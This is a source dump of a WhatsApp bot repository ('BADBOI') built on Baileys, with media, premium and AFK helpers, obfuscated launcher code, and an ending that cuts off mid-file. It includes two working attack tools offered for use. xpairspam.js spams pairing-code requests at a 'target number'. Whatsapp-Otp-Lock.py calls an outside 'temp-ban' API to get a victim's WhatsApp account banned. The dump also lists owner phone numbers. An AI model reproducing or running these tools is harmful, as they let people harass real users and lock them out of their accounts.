├── .gitignore ├── database ├── tempban.json ├── afk-user.json ├── autoreply │ ├── vn.json │ ├── apk.json │ ├── doc.json │ ├── sticker.json │ ├── video.json │ ├── zip.json │ ├── vn.json.bak │ └── image.json ├── total-hit-user.json ├── owner.json ├── owner.json.bak └── premium.json ├── Badboi ├── session │ └── binary64.bin ├── o.jpg ├── x.jpg ├── x.mp3 ├── x.webp ├── xx1.png ├── xx2.jpg ├── xeontext11.js ├── xeontext9.js └── xeontext4.js ├── BadboiMedia ├── apk │ └── badboi.js ├── audio │ └── badboi.js ├── doc │ └── badboi.js ├── gif │ └── badboi.js ├── image │ └── badboi.js ├── trash │ └── badboi.js ├── video │ └── badboi.js ├── zip │ ├── badboi.js │ └── video │ │ └── badboi.js ├── sticker │ └── badboi.js ├── thumb.jpg ├── donate.jpg └── thumb2.mp4 ├── Procfile ├── If I sell SC Free, it turns out I won't get SC Free Plum again └── badboi.js ├── Dockerfile ├── lib ├── scraper.js ├── afk.js ├── quote.js ├── converter.js ├── premiun.js ├── uploader.js ├── myfunc2.js ├── exif.js └── myfunc.js ├── index.js ├── package.json ├── xpairspam.js ├── Whatsapp-Otp-Lock.py ├── Permanent-Wh-Otp-Lock.py ├── README.md └── main.js /.gitignore: -------------------------------------------------------------------------------- 1 | node_modules -------------------------------------------------------------------------------- /database/tempban.json: -------------------------------------------------------------------------------- 1 | [] -------------------------------------------------------------------------------- /database/afk-user.json: -------------------------------------------------------------------------------- 1 | [{}] -------------------------------------------------------------------------------- /database/autoreply/vn.json: -------------------------------------------------------------------------------- 1 | [] -------------------------------------------------------------------------------- /Badboi/session/binary64.bin: -------------------------------------------------------------------------------- 1 | lwra -------------------------------------------------------------------------------- /BadboiMedia/apk/badboi.js: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /BadboiMedia/audio/badboi.js: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /BadboiMedia/doc/badboi.js: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /BadboiMedia/gif/badboi.js: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /BadboiMedia/image/badboi.js: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /BadboiMedia/trash/badboi.js: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /BadboiMedia/video/badboi.js: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /BadboiMedia/zip/badboi.js: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /database/autoreply/apk.json: -------------------------------------------------------------------------------- 1 | [] -------------------------------------------------------------------------------- /database/autoreply/doc.json: -------------------------------------------------------------------------------- 1 | [] -------------------------------------------------------------------------------- /database/autoreply/sticker.json: -------------------------------------------------------------------------------- 1 | [] -------------------------------------------------------------------------------- /database/autoreply/video.json: -------------------------------------------------------------------------------- 1 | [] -------------------------------------------------------------------------------- /database/autoreply/zip.json: -------------------------------------------------------------------------------- 1 | [] -------------------------------------------------------------------------------- /BadboiMedia/sticker/badboi.js: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /BadboiMedia/zip/video/badboi.js: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /database/autoreply/vn.json.bak: -------------------------------------------------------------------------------- 1 | [""] -------------------------------------------------------------------------------- /Procfile: -------------------------------------------------------------------------------- 1 | worker: npm install && npm start -------------------------------------------------------------------------------- /database/autoreply/image.json: -------------------------------------------------------------------------------- 1 | ["@917508392664"] -------------------------------------------------------------------------------- /database/total-hit-user.json: -------------------------------------------------------------------------------- 1 | [{"hit_cmd":11335}] -------------------------------------------------------------------------------- /database/owner.json: -------------------------------------------------------------------------------- 1 | ["2348140825959","2348140825959"] -------------------------------------------------------------------------------- /database/owner.json.bak: -------------------------------------------------------------------------------- 1 | ["2348140825959","2348140825959"] -------------------------------------------------------------------------------- /If I sell SC Free, it turns out I won't get SC Free Plum again/badboi.js: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /Badboi/o.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/BADBOI-v1/BADBOI-v4/HEAD/Badboi/o.jpg -------------------------------------------------------------------------------- /Badboi/x.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/BADBOI-v1/BADBOI-v4/HEAD/Badboi/x.jpg -------------------------------------------------------------------------------- /Badboi/x.mp3: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/BADBOI-v1/BADBOI-v4/HEAD/Badboi/x.mp3 -------------------------------------------------------------------------------- /Badboi/x.webp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/BADBOI-v1/BADBOI-v4/HEAD/Badboi/x.webp -------------------------------------------------------------------------------- /Badboi/xx1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/BADBOI-v1/BADBOI-v4/HEAD/Badboi/xx1.png -------------------------------------------------------------------------------- /Badboi/xx2.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/BADBOI-v1/BADBOI-v4/HEAD/Badboi/xx2.jpg -------------------------------------------------------------------------------- /BadboiMedia/thumb.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/BADBOI-v1/BADBOI-v4/HEAD/BadboiMedia/thumb.jpg -------------------------------------------------------------------------------- /BadboiMedia/donate.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/BADBOI-v1/BADBOI-v4/HEAD/BadboiMedia/donate.jpg -------------------------------------------------------------------------------- /BadboiMedia/thumb2.mp4: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/BADBOI-v1/BADBOI-v4/HEAD/BadboiMedia/thumb2.mp4 -------------------------------------------------------------------------------- /database/premium.json: -------------------------------------------------------------------------------- 1 | [{},{"id":"2348140825959@s.whatsapp.net","expired":10359417954514},{"id":"2348140825959@s.whatsapp.net","expired":8641720190360592},{"id":"2348140825959@s.whatsapp.net","expired":86400001723797750000}] -------------------------------------------------------------------------------- /Dockerfile: -------------------------------------------------------------------------------- 1 | 2 | FROM node:lts-buster 3 | 4 | RUN apt-get update && \ 5 | apt-get install -y \ 6 | ffmpeg \ 7 | imagemagick \ 8 | webp && \ 9 | apt-get upgrade -y && \ 10 | rm -rf /var/lib/apt/lists/* 11 | 12 | COPY package.json . 13 | 14 | RUN npm install && npm install qrcode-terminal 15 | 16 | COPY . . 17 | 18 | EXPOSE 3000 19 | 20 | CMD ["node", "index.js", "--server"] 21 | -------------------------------------------------------------------------------- /lib/scraper.js: -------------------------------------------------------------------------------- 1 | const axios = require("axios"); 2 | const yts = require("yt-search"); 3 | const getVideoId = async (...args) => 4 | import("get-video-id").then(m => m(...args)); 5 | 6 | const API = "https://astro-api-crqy.onrender.com/"; 7 | const ytIdRegex = 8 | /(?:youtube\.com\/\S*(?:(?:\/e(?:mbed))?\/|watch\?(?:\S*?&?v\=))|youtu\.be\/)([a-zA-Z0-9_-]{6,11})/; 9 | 10 | async function youtube(query) { 11 | const trimmedQuery = query.trim(); 12 | const url = `api/youtube-download?url=${encodeURIComponent(trimmedQuery)}`; 13 | const response = await axios.get(API + url, { responseType: "json" }); 14 | const media = response.data.url; 15 | const videoResponse = await axios.get(media, { 16 | responseType: "arraybuffer" 17 | }); 18 | return Buffer.from(videoResponse.data); 19 | } 20 | 21 | async function ytmp3(query) { 22 | const trimmedQuery = query.trim(); 23 | const url = `api/youtube-mp3-download?url=${encodeURIComponent( 24 | trimmedQuery 25 | )}`; 26 | const response = await axios.get(API + url, { responseType: "json" }); 27 | const media = response.data.audio; 28 | const videoResponse = await axios.get(media, { 29 | responseType: "arraybuffer" 30 | }); 31 | return Buffer.from(videoResponse.data); 32 | } 33 | 34 | async function searchUrl(url) { 35 | if (!isYTUrl(url)) return {}; 36 | const { id } = await getVideoId(url); 37 | const videoDat = await yts({ videoId: id }); 38 | return videoDat; 39 | } 40 | 41 | function isYTUrl(url) { 42 | return ytIdRegex.test(url); 43 | } 44 | 45 | module.exports = { 46 | searchUrl, 47 | isYTUrl, 48 | youtube, 49 | ytmp3 50 | }; 51 | -------------------------------------------------------------------------------- /index.js: -------------------------------------------------------------------------------- 1 | const _0x155829=_0x304a;function _0x1a87(){const _0x338e12=['path','3471486qYZEWa','15FChQjS','reset','31049130LRvEuP','inherit','Exited\x20with\x20code:','error','log','main.js','4YumGDu','slice','exit','678272oBjwJD','1109877DrTMNC','argv','kill','Restarting\x20Bot...','3012898CJSTET','ipc','72lqQMat','2054156QpsrEr','1148311axlxYH','child_process','message'];_0x1a87=function(){return _0x338e12;};return _0x1a87();}(function(_0x24321f,_0x8ce24c){const _0x47566d=_0x304a,_0x43d1f3=_0x24321f();while(!![]){try{const _0x3dad30=-parseInt(_0x47566d(0x10d))/0x1+-parseInt(_0x47566d(0x101))/0x2*(-parseInt(_0x47566d(0x105))/0x3)+-parseInt(_0x47566d(0x10c))/0x4*(parseInt(_0x47566d(0x112))/0x5)+-parseInt(_0x47566d(0x111))/0x6+-parseInt(_0x47566d(0x109))/0x7+parseInt(_0x47566d(0x104))/0x8*(parseInt(_0x47566d(0x10b))/0x9)+parseInt(_0x47566d(0xfb))/0xa;if(_0x3dad30===_0x8ce24c)break;else _0x43d1f3['push'](_0x43d1f3['shift']());}catch(_0x419419){_0x43d1f3['push'](_0x43d1f3['shift']());}}}(_0x1a87,0xc975c));const {spawn}=require(_0x155829(0x10e)),path=require(_0x155829(0x110));function start(){const _0x56ac5a=_0x155829;let _0x43790b=[path['join'](__dirname,_0x56ac5a(0x100)),...process[_0x56ac5a(0x106)][_0x56ac5a(0x102)](0x2)];console[_0x56ac5a(0xff)]([process[_0x56ac5a(0x106)][0x0],..._0x43790b]['join']('\x0a'));let _0x3f86bb=spawn(process[_0x56ac5a(0x106)][0x0],_0x43790b,{'stdio':[_0x56ac5a(0xfc),_0x56ac5a(0xfc),_0x56ac5a(0xfc),_0x56ac5a(0x10a)]})['on'](_0x56ac5a(0x10f),_0xeaa2=>{const _0x3ddefe=_0x56ac5a;_0xeaa2==_0x3ddefe(0x113)&&(console['log'](_0x3ddefe(0x108)),_0x3f86bb[_0x3ddefe(0x107)](),start(),delete _0x3f86bb);})['on'](_0x56ac5a(0x103),_0x45884d=>{const _0x355151=_0x56ac5a;console[_0x355151(0xfe)](_0x355151(0xfd),_0x45884d);if(_0x45884d=='.'||_0x45884d==0x1||_0x45884d==0x0)start();});}function _0x304a(_0x5e927d,_0x12be78){const _0x1a8751=_0x1a87();return _0x304a=function(_0x304a43,_0x5b2c65){_0x304a43=_0x304a43-0xfb;let _0x185da3=_0x1a8751[_0x304a43];return _0x185da3;},_0x304a(_0x5e927d,_0x12be78);}start(); -------------------------------------------------------------------------------- /lib/afk.js: -------------------------------------------------------------------------------- 1 | //base by BADBOI (BADBOI Bot Inc.) 2 | //re-upload? recode? copy code? give credit ya :) 3 | //YouTube: @BADBOI-k2i 4 | //Instagram: Lord_badboi 5 | //Telegram: t.me/Lord_badboi 6 | //GitHub: @BADBOI-v1 7 | //WhatsApp: +2348140825959 8 | //want more free bot scripts? subscribe to my youtube channel: https://youtube.com/@BADBOI-k2i 9 | 10 | const fs = require('fs') 11 | 12 | const addAfkUser = (userId, time, reason, _dir) => { 13 | const obj = { id: userId, time: time, reason: reason } 14 | _dir.push(obj) 15 | fs.writeFileSync('./database/afk-user.json', JSON.stringify(_dir, null, 2)) 16 | } 17 | const checkAfkUser = (userId, _dir) => { 18 | let status = false 19 | Object.keys(_dir).forEach((i) => { 20 | if (_dir[i].id === userId) { 21 | status = true 22 | } 23 | }) 24 | return status 25 | } 26 | const getAfkReason = (userId, _dir) => { 27 | let position = null 28 | Object.keys(_dir).forEach((i) => { 29 | if (_dir[i].id === userId) { 30 | position = i 31 | } 32 | }) 33 | if (position !== null) { 34 | return _dir[position].reason 35 | } 36 | } 37 | const getAfkTime = (userId, _dir) => { 38 | let position = null 39 | Object.keys(_dir).forEach((i) => { 40 | if (_dir[i].id === userId) { 41 | position = i 42 | } 43 | }) 44 | if (position !== null) { 45 | return _dir[position].time 46 | } 47 | } 48 | const getAfkId = (userId, _dir) => { 49 | let position = null 50 | Object.keys(_dir).forEach((i) => { 51 | if (_dir[i].id === userId) { 52 | position = i 53 | } 54 | }) 55 | if (position !== null) { 56 | return _dir[position].id 57 | } 58 | } 59 | const getAfkPosition = (userId, _dir) => { 60 | let position = null 61 | Object.keys(_dir).forEach((i) => { 62 | if (_dir[i].id === userId) { 63 | position = i 64 | } 65 | }) 66 | return position 67 | } 68 | module.exports = { 69 | addAfkUser, 70 | checkAfkUser, 71 | getAfkReason, 72 | getAfkTime, 73 | getAfkId, 74 | getAfkPosition 75 | } 76 | -------------------------------------------------------------------------------- /lib/quote.js: -------------------------------------------------------------------------------- 1 | //base by BADBOI (BADBOI Bot Inc.) 2 | //re-upload? recode? copy code? give credit ya :) 3 | //YouTube: @BADBOI-k2i 4 | //Instagram: Lord_badboi 5 | //Telegram: t.me/Lord_badboi 6 | //GitHub: @BADBOI-v1 7 | //WhatsApp: +2348140825959 8 | //want more free bot scripts? subscribe to my youtube channel: https://youtube.com/@BADBOI-k2i 9 | 10 | const _0x187749=_0x4a4c;(function(_0x2d363b,_0x52dbe9){const _0x56dfc2=_0x4a4c,_0x4119f4=_0x2d363b();while(!![]){try{const _0x2ff1d9=parseInt(_0x56dfc2(0x1c2))/0x1*(-parseInt(_0x56dfc2(0x1be))/0x2)+parseInt(_0x56dfc2(0x1b9))/0x3*(-parseInt(_0x56dfc2(0x1bf))/0x4)+parseInt(_0x56dfc2(0x1c6))/0x5*(-parseInt(_0x56dfc2(0x1ba))/0x6)+parseInt(_0x56dfc2(0x1bd))/0x7+-parseInt(_0x56dfc2(0x1c8))/0x8+-parseInt(_0x56dfc2(0x1b5))/0x9+parseInt(_0x56dfc2(0x1c3))/0xa;if(_0x2ff1d9===_0x52dbe9)break;else _0x4119f4['push'](_0x4119f4['shift']());}catch(_0xc89cb9){_0x4119f4['push'](_0x4119f4['shift']());}}}(_0x454f,0xcdc2b));const axios=require(_0x187749(0x1c7)),quote=async(_0x53f5ed,_0x345de1,_0x37e973)=>{const _0x596b3c=_0x187749,_0x57ce76={'type':_0x596b3c(0x1bc),'format':'png','backgroundColor':'#FFFFFF','width':0x200,'height':0x300,'scale':0x2,'messages':[{'entities':[],'avatar':!![],'from':{'id':0x1,'name':_0x345de1,'photo':{'url':_0x37e973}},'text':_0x53f5ed,'replyMessage':{}}]},_0x1a7080=await axios[_0x596b3c(0x1b4)](_0x596b3c(0x1b8),_0x57ce76,{'headers':{'Content-Type':_0x596b3c(0x1c5)}}),_0x311147=Buffer[_0x596b3c(0x1c4)](_0x1a7080[_0x596b3c(0x1b7)][_0x596b3c(0x1bb)][_0x596b3c(0x1b6)],_0x596b3c(0x1b3));return{'status':'200','creator':_0x596b3c(0x1c0),'result':_0x311147};};function _0x454f(){const _0x85785d=['1093094ggbjSZ','4RkwAty','AdrianTzy','exports','1qMUCBh','43588690mbrFpz','from','application/json','15JPYWFb','axios','5836832TVJhzh','base64','post','10489428ZXAhvo','image','data','https://quote-api.bokov68872.repl.co/generate','1479573ZJSUov','2253354vEjEHI','result','quote','3818059TkHEnK'];_0x454f=function(){return _0x85785d;};return _0x454f();}function _0x4a4c(_0x26fa2,_0x1bb3c0){const _0x454f9e=_0x454f();return _0x4a4c=function(_0x4a4caf,_0x3ddd7c){_0x4a4caf=_0x4a4caf-0x1b3;let _0x2bace1=_0x454f9e[_0x4a4caf];return _0x2bace1;},_0x4a4c(_0x26fa2,_0x1bb3c0);}module[_0x187749(0x1c1)]={'quote':quote}; 11 | -------------------------------------------------------------------------------- /package.json: -------------------------------------------------------------------------------- 1 | { 2 | "name": "dcx", 3 | "version": "0.0.1", 4 | "description": "Anita Is a Simple WA Bot Using Library Baileys", 5 | "main": "index.js", 6 | "type": "commonjs", 7 | "scripts": { 8 | "start": "node index.js" 9 | }, 10 | "keywords": [ 11 | "whiskeysockets", 12 | "multi-device" 13 | ], 14 | "author": "DavidCyril", 15 | "license": "MIT", 16 | "dependencies": { 17 | "@adiwajshing/baileys": "npm:@whiskeysockets/baileys@6.6.0", 18 | "@adiwajshing/keyed-db": "^0.2.4", 19 | "@ffmpeg-installer/ffmpeg": "^1.1.0", 20 | "@hapi/boom": "^10.0.1", 21 | "@vitalets/google-translate-api": "^8.0.0", 22 | "@whiskeysockets/baileys": "^6.6.0", 23 | "awesome-phonenumber": "^6.4.0", 24 | "aws4": "^1.12.0", 25 | "axios": "^1.6.7", 26 | "cfonts": "^3.2.0", 27 | "chalk": "^4.1.2", 28 | "check-disk-space": "^3.3.1", 29 | "cheerio": "^1.0.0-rc.12", 30 | "child_process": "^1.0.2", 31 | "colors": "^1.4.0", 32 | "cookie": "^0.6.0", 33 | "crypto": "^1.0.1", 34 | "d-scrape": "^1.2.0", 35 | "dhn-api": "^1.1.3", 36 | "emoji-regex": "^10.3.0", 37 | "file-type": "^16.5.3", 38 | "fluent-ffmpeg": "^2.1.2", 39 | "fs": "^0.0.1-security", 40 | "fs-extra": "^10.0.0", 41 | "g-i-s": "^2.1.7", 42 | "g4f": "^1.4.3", 43 | "greetify": "^2.0.1", 44 | "https-proxy-agent": "^7.0.4", 45 | "human-readable": "^0.2.1", 46 | "jimp": "^0.16.1", 47 | "lodash": "latest", 48 | "lolcatjs": "^2.4.1", 49 | "lowdb": "^7.0.1", 50 | "moment-timezone": "^0.5.34", 51 | "mongoose": "^7.1.1", 52 | "node-cron": "^3.0.3", 53 | "node-fetch": "^2.6.7", 54 | "node-id3": "^0.2.6", 55 | "node-os-utils": "^1.3.6", 56 | "node-webpmux": "^3.1.0", 57 | "node-youtube-music": "^0.10.3", 58 | "object-query-string": "^1.2.0", 59 | "ocr-space-api-wrapper": "^2.2.0", 60 | "os": "^0.1.2", 61 | "path": "^0.12.7", 62 | "perf_hooks": "0.0.1", 63 | "performance-now": "*", 64 | "pino": "^8.17.2", 65 | "qrcode": "^1.5.3", 66 | "razzaq-suppress": "^1.0.1", 67 | "remove.bg": "^1.3.0", 68 | "removebg-id": "^2.0.1", 69 | "rimraf": "^5.0.5", 70 | "scrape-primbon": "^1.1.0", 71 | "socks-proxy-agent": "^8.0.3", 72 | "steno": "^1.0.0", 73 | "syntax-error": "^1.4.0", 74 | "yargs": "^17.7.2", 75 | "youtube-yts": "^2.0.0", 76 | "@distube/ytdl-core": "^4.13.5", 77 | "youtubedl-core": "^4.11.7" 78 | } 79 | } 80 | -------------------------------------------------------------------------------- /lib/converter.js: -------------------------------------------------------------------------------- 1 | //base by BADBOI (BADBOI Bot Inc.) 2 | //re-upload? recode? copy code? give credit ya :) 3 | //YouTube: @BADBOI-k2i 4 | //Instagram: Lord_badboi 5 | //Telegram: t.me/Lord_badboi 6 | //GitHub: @BADBOI-v1 7 | //WhatsApp: +2348140825959 8 | //want more free bot scripts? subscribe to my youtube channel: https://youtube.com/@BADBOI-k2i 9 | 10 | const fs = require('fs') 11 | const path = require('path') 12 | const { spawn } = require('child_process') 13 | 14 | function ffmpeg(buffer, args = [], ext = '', ext2 = '') { 15 | return new Promise(async (resolve, reject) => { 16 | try { 17 | let tmp = path.join(__dirname, '../database', + new Date + '.' + ext) 18 | let out = tmp + '.' + ext2 19 | await fs.promises.writeFile(tmp, buffer) 20 | spawn('ffmpeg', [ 21 | '-y', 22 | '-i', tmp, 23 | ...args, 24 | out 25 | ]) 26 | .on('error', reject) 27 | .on('close', async (code) => { 28 | try { 29 | await fs.promises.unlink(tmp) 30 | if (code !== 0) return reject(code) 31 | resolve(await fs.promises.readFile(out)) 32 | await fs.promises.unlink(out) 33 | } catch (e) { 34 | reject(e) 35 | } 36 | }) 37 | } catch (e) { 38 | reject(e) 39 | } 40 | }) 41 | } 42 | 43 | /** 44 | * Convert Audio to Playable WhatsApp Audio 45 | * @param {Buffer} buffer Audio Buffer 46 | * @param {String} ext File Extension 47 | */ 48 | function toAudio(buffer, ext) { 49 | return ffmpeg(buffer, [ 50 | '-vn', 51 | '-ac', '2', 52 | '-b:a', '128k', 53 | '-ar', '44100', 54 | '-f', 'mp3' 55 | ], ext, 'mp3') 56 | } 57 | 58 | /** 59 | * Convert Audio to Playable WhatsApp PTT 60 | * @param {Buffer} buffer Audio Buffer 61 | * @param {String} ext File Extension 62 | */ 63 | function toPTT(buffer, ext) { 64 | return ffmpeg(buffer, [ 65 | '-vn', 66 | '-c:a', 'libopus', 67 | '-b:a', '128k', 68 | '-vbr', 'on', 69 | '-compression_level', '10' 70 | ], ext, 'opus') 71 | } 72 | 73 | /** 74 | * Convert Audio to Playable WhatsApp Video 75 | * @param {Buffer} buffer Video Buffer 76 | * @param {String} ext File Extension 77 | */ 78 | function toVideo(buffer, ext) { 79 | return ffmpeg(buffer, [ 80 | '-c:v', 'libx264', 81 | '-c:a', 'aac', 82 | '-ab', '128k', 83 | '-ar', '44100', 84 | '-crf', '32', 85 | '-preset', 'slow' 86 | ], ext, 'mp4') 87 | } 88 | 89 | module.exports = { 90 | toAudio, 91 | toPTT, 92 | toVideo, 93 | ffmpeg, 94 | } 95 | -------------------------------------------------------------------------------- /xpairspam.js: -------------------------------------------------------------------------------- 1 | const { default: makeWASocket, useMultiFileAuthState } = require("@whiskeysockets/baileys"); 2 | const pino = require('pino'); 3 | const readline = require("readline"); 4 | 5 | 6 | const color = [ 7 | '\x1b[31m', 8 | '\x1b[32m', 9 | '\x1b[33m', 10 | '\x1b[34m', 11 | '\x1b[35m', 12 | '\x1b[36m', 13 | '\x1b[37m', 14 | '\x1b[90m' 15 | ]; 16 | const xeonColor = color[Math.floor(Math.random() * color.length)]; 17 | 18 | const xColor = '\x1b[0m'; 19 | 20 | const question = (text) => { 21 | const rl = readline.createInterface({ input: process.stdin, output: process.stdout }); 22 | return new Promise((resolve) => { rl.question(text, resolve) }); 23 | }; 24 | 25 | async function XeonProject() { 26 | const { state } = await useMultiFileAuthState('./Badboi/session'); 27 | const XeonBotInc = makeWASocket({ 28 | logger: pino({ level: "silent" }), 29 | printQRInTerminal: false, 30 | auth: state, 31 | connectTimeoutMs: 60000, 32 | defaultQueryTimeoutMs: 0, 33 | keepAliveIntervalMs: 10000, 34 | emitOwnEvents: true, 35 | fireInitQueries: true, 36 | generateHighQualityLinkPreview: true, 37 | syncFullHistory: true, 38 | markOnlineOnConnect: true, 39 | browser: ["Ubuntu", "Chrome", "20.0.04"], 40 | }); 41 | try { 42 | // Ask for phone number 43 | const phoneNumber = await question(xeonColor + 'Enter target number🤙 : ' + xColor); 44 | 45 | // Request the desired number of pairing codes 46 | const xeonCodes = parseInt(await question(xeonColor + 'Amount 😽 : '+ xColor)); 47 | 48 | if (isNaN(xeonCodes) || xeonCodes <= 0) { 49 | console.log('example : 20.'); 50 | return; 51 | } 52 | 53 | // Get and display pairing code 54 | for (let i = 0; i < xeonCodes; i++) { 55 | try { 56 | let code = await XeonBotInc.requestPairingCode(phoneNumber); 57 | code = code?.match(/.{1,4}/g)?.join("-") || code; 58 | console.log(xeonColor + `${phoneNumber} [${i + 1}/${xeonCodes}]`+ xColor); 59 | } catch (error) { 60 | console.error('Error:', error.message); 61 | } 62 | } 63 | } catch (error) { 64 | console.error('error') ; 65 | } 66 | 67 | return XeonBotInc; 68 | } 69 | console.log(xeonColor + `═╗ ╦┌─┐┌─┐┌┐┌ ╔═╗┌─┐┌─┐┌┬┐ ╔╗╔┌─┐┌┬┐┬┌─┐┬┌─┐┌─┐┌┬┐┬┌─┐┌┐┌ 70 | ╔╩╦╝├┤ │ ││││ ╚═╗├─┘├─┤│││ ║║║│ │ │ │├┤ ││ ├─┤ │ ││ ││││ 71 | ╩ ╚═└─┘└─┘┘└┘ ╚═╝┴ ┴ ┴┴ ┴ ╝╚╝└─┘ ┴ ┴└ ┴└─┘┴ ┴ ┴ ┴└─┘┘└┘` + xColor); 72 | 73 | XeonProject(); -------------------------------------------------------------------------------- /Whatsapp-Otp-Lock.py: -------------------------------------------------------------------------------- 1 | import requests 2 | import os 3 | import time 4 | from rich import print 5 | 6 | # Banner function with animated colorful text effect 7 | def otp_lock_banner(): 8 | os.system("cls" if os.name == "nt" else "clear") 9 | 10 | # Animated colorful text effect 11 | colors = ["red", "yellow", "green", "cyan", "blue", "magenta"] 12 | for color in colors: 13 | os.system("cls" if os.name == "nt" else "clear") 14 | print(f''' 15 | [bold {color}]●[bold {colors[(colors.index(color) + 1) % len(colors)]}] ●[bold {colors[(colors.index(color) + 2) % len(colors)]}] ● 16 | .---. .----------- 17 | / \ __ / ------ 18 | / / \( )/ ----- 19 | ////// ' \/ ` --- 20 | //// / // : : --- 21 | // / / /` '-- 22 | // //..\\\ 23 | 24 | ====UU====UU==== 25 | '//||\\` 26 | [bold white]====================================== 27 | [bold white][[bold red]^[bold white]] [bold green] Author: Krishna & Ꭰᥲʀk Ꮮᴇᴀᴅᴇʀ \n[bold white][[bold red]^[bold white]] [bold green] Github: github.com/Mr-Krishna-90 \n[bold white][[bold red]^[bold white]] [bold green] Telegram: https://t.me/+GrRkWxyiROs4ZGU1 28 | [bold white]====================================== ''') 29 | time.sleep(0.5) 30 | 31 | print('''[bold white]====================================== 32 | [bold white][[bold red]^[bold white]] [bold green] Author: Krishna & Ꭰᥲʀk Ꮮᴇᴀᴅᴇʀ [bold white][[bold red]^[bold white]] [bold green] Github: github.com/Mr-Krishna-90 [bold white][[bold red]^[bold white]] [bold green] Telegram: https://t.me/+GrRkWxyiROs4ZGU1 33 | [bold white]====================================== ''') 34 | 35 | # API function 36 | def temp_ban_api(country_code, phone_number): 37 | try: 38 | api_url = f"https://api-bruxiintk.online/api/temp-ban?apikey=bx&ddi={country_code}&numero={phone_number}" 39 | response = requests.get(api_url) 40 | response.raise_for_status() # Raise an exception for HTTP errors 41 | if response.status_code == 200: 42 | return "\n[bold green] [94m[✓]Successfully done\n [bold green]Completed..!!\n\n[bold green]Thank You For Use My Script!!\n Created By Krishna!!\n" 43 | 44 | else: 45 | return "Not done" 46 | except requests.exceptions.RequestException as e: 47 | return f"Error: {e}" 48 | 49 | # Main function 50 | def main(): 51 | otp_lock_banner() # Display OTP Lock banner 52 | country_code = input("\n\033[90m[\033[91m?\033[90m]] \033[92m[?]Enter Your Country Code(ex..+91) " '\n └─> ') 53 | if not country_code.startswith("+"): 54 | country_code = "+" + country_code 55 | 56 | phone_number = input("\n\033[90m[\033[91m?\033[90m]] \033[92m[?]Enter Your Mobile Number " '\n └─> ') 57 | phone_number = phone_number.replace(" ", "") # Remove spaces 58 | 59 | result = temp_ban_api(country_code, phone_number) 60 | print(result) 61 | 62 | if __name__ == "__main__": 63 | main() -------------------------------------------------------------------------------- /lib/premiun.js: -------------------------------------------------------------------------------- 1 | //base by BADBOI (BADBOI Bot Inc.) 2 | //re-upload? recode? copy code? give credit ya :) 3 | //YouTube: @BADBOI-k2i 4 | //Instagram: Lord_badboi 5 | //Telegram: t.me/Lord_badboi 6 | //GitHub: @BADBOI-v1 7 | //WhatsApp: +2348140825959 8 | //want more free bot scripts? subscribe to my youtube channel: https://youtube.com/@BADBOI-k2i 9 | 10 | const fs = require("fs"); 11 | const toMs = require("ms"); 12 | 13 | const premium = JSON.parse(fs.readFileSync('./database/premium.json')) 14 | /** 15 | * Add premium user. 16 | * @param {String} userId 17 | * @param {String} expired 18 | * @param {Object} _dir 19 | */ 20 | const addPremiumUser = (userId, expired, _dir) => { 21 | const cekUser = premium.find((user) => user.id == userId); 22 | if (cekUser) { 23 | cekUser.expired = cekUser.expired + toMs(expired); 24 | } else { 25 | const obj = { id: userId, expired: Date.now() + toMs(expired) }; 26 | _dir.push(obj); 27 | } 28 | fs.writeFileSync("./database/premium.json", JSON.stringify(_dir)); 29 | }; 30 | 31 | /** 32 | * Get premium user position. 33 | * @param {String} userId 34 | * @param {Object} _dir 35 | * @returns {Number} 36 | */ 37 | const getPremiumPosition = (userId, _dir) => { 38 | let position = null; 39 | Object.keys(_dir).forEach((i) => { 40 | if (_dir[i].id === userId) { 41 | position = i; 42 | } 43 | }); 44 | if (position !== null) { 45 | return position; 46 | } 47 | }; 48 | 49 | /** 50 | * Get premium user expire. 51 | * @param {String} userId 52 | * @param {Object} _dir 53 | * @returns {Number} 54 | */ 55 | const getPremiumExpired = (userId, _dir) => { 56 | let position = null; 57 | Object.keys(_dir).forEach((i) => { 58 | if (_dir[i].id === userId) { 59 | position = i; 60 | } 61 | }); 62 | if (position !== null) { 63 | return _dir[position].expired; 64 | } 65 | }; 66 | 67 | /** 68 | * Check user is premium. 69 | * @param {String} userId 70 | * @param {Object} _dir 71 | * @returns {Boolean} 72 | */ 73 | const checkPremiumUser = (userId, _dir) => { 74 | let status = false; 75 | Object.keys(_dir).forEach((i) => { 76 | if (_dir[i].id === userId) { 77 | status = true; 78 | } 79 | }); 80 | return status; 81 | }; 82 | 83 | /** 84 | * Constantly checking premium. 85 | * @param {Object} _dir 86 | */ 87 | const expiredCheck = (XeonBotInc, msg, _dir) => { 88 | setInterval(() => { 89 | let position = null; 90 | Object.keys(_dir).forEach((i) => { 91 | if (Date.now() >= _dir[i].expired) { 92 | position = i; 93 | } 94 | }); 95 | if (position !== null) { 96 | idny = _dir[position].id; 97 | console.log(`Premium expired: ${_dir[position].id}`); 98 | _dir.splice(position, 1); 99 | fs.writeFileSync("./database/premium.json", JSON.stringify(_dir)); 100 | idny ? XeonBotInc.sendMessage(idny, { text: "Your premium has run out, please buy again." }) : ""; 101 | idny = false; 102 | } 103 | }, 1000); 104 | }; 105 | 106 | /** 107 | * Get all premium user ID. 108 | * @param {Object} _dir 109 | * @returns {String[]} 110 | */ 111 | const getAllPremiumUser = (_dir) => { 112 